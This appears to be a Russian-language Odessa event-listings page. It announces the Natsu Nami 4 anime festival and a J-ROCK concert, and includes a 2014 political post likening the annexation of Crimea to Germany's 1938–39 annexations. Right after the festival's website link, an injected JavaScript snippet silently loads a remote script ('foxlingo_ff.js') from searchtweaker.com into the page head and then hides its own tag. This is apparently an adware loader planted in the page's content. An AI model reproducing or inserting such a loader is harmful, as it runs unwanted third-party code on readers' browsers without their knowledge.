Аниме - фестиваль Natsu Nami 4 в Одессе

Международный аниме - фестиваль " Natsu Nami 4" в Одессе 19 июля четвертый раз открывает свои двери и приглашает юношей и девушек познакомится с одним из интереснейших течений современной молодежной субкультуры.

Все посетители Аниме-фестиваля Natsu Nami 4 " в Одессе получат незабываемые положительные эмоции от яркой, красочной, самобытной программы.
 
Аниме - фестиваль в Одессе - это всегда ярко, интересно и креативно, что подтверждается большим интересом средств массовой информации, которые в большом количестве посещают фестиваль.
 
ПРОГРАММА Аниме-фестиваль " Natsu Nami 4 "в ОДЕССЕ
 
Место проведения первого дня фестиваля (19 июля)
г. Одесса, ул. Бунина, 15, Одесская Филармонии 
Программа первого дня (19 июля с 13,00 до 20,00) фестиваля: Открытие фестиваля; Косплей-программа; Конкурс караоке; Сценические постановки;
Программа праздника моды и стиля  "Opera Classic" ; Выставка-ярмарка; Турниры по настольным и консольным играм;
Мейд-кафе; Закрытие первого дня фестиваля.
 
Программа второго дня (20 июля с 12,00 до 18,00) фестиваля:
Кинопоказ;
Конкурс AMV;
Награждение;
Мастер-Классы Более детально познакомится с программой, историей Аниме-фестиваля в Одессе и получить все необходимые контакты вы сможете на сайте фестиваля - http://natsunami.com.ua/
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Присоединиться к событию

Дежавю

 
- В марте 1938 года Германия беспрепятственно присоединяет к себе Австрию (см. Аншлюс).
* Мировая общественность это проглотила.
- В октябре 1938 года в результате Мюнхенского соглашения Германия аннексирует принадлежавшую Чехословакии Судетскую область.
* Мировая общественность и  это проглотила.
- В марте 1939 была оккупирована оставшаяся часть Чехословакии, превращённая в государство-сателлит Протекторат Богемии и Моравии, а также аннексирована часть территории Литвы близ Клайпеды (Мемельская область).
* Мировая общественность и  это проглотила.
- 1939 год, опьяненный своей безнаказанностью Гитлер начал Вторую мировую войну.

***

- 2014 год и снова март, но уже новый ДИКТАТОР хочет подмять под себя Унитарное Суверенное государство УКРАИНА.
* Мировая общественность! Какой выбор сделаешь ты сейчас? Трусливо позволишь захватить СВОБОДНЫХ людей в раболепном трепете и надежде, что до Вас руки УЗУРПАТОРА не дотянутся? Или укажешь ОБЫЧНОМУ ЧЕЛОВЕКУ заигравшегося в ИМПЕРАТОРА ВСЕЯ РУСИ его место, пока еще не поздно?

J-ROCK-концерт!!! в Одессе!

Любишь японскую и восточную музыку, аниме, J-ROCK, visual kei? Тогда готовься к незабываемому шоу! ТАКОЕ пропускать нельзя! Встречаем артиста из Японии в вашем городе! Концерт+Автограф-сессия+after-party! ДАТА: 28 марта 2014, 19-30 МЕСТО: CARDAN MUSIC CLUB (ул. Преображенская, 66) БИЛЕТЫ: Первые 20 билетов - 50 грн, остальные - 60 грн, в день проведения - 75 грн. VIP-билет (встреча с артистом, подарок, и прочие бонусы) - 250 грн. Билеты вскоре поступят в продажу! Об артисте: SANA (Япония, J-ROCK, visual kei) http://vk.com/sana_sama SANA известен как гитарист и участник групп Mask, S3V3N, Kin, а так же по совместной работе с популярными японскими сейю и исполнителями, такими как Satsuki (ex-Rentrer en soi), Hiroaki Takahashi (сейю в One Piece, Gundam и др.), Hiroaki Takahashi (сейю в Prince of Tennis, GashBell, и др.). В Одессе он представит сольную программу, над которой работал несколько лет! Не пропустите, будет жарко! Биография: http://vk.com/topic-46582435_29241201

Присоединиться к событию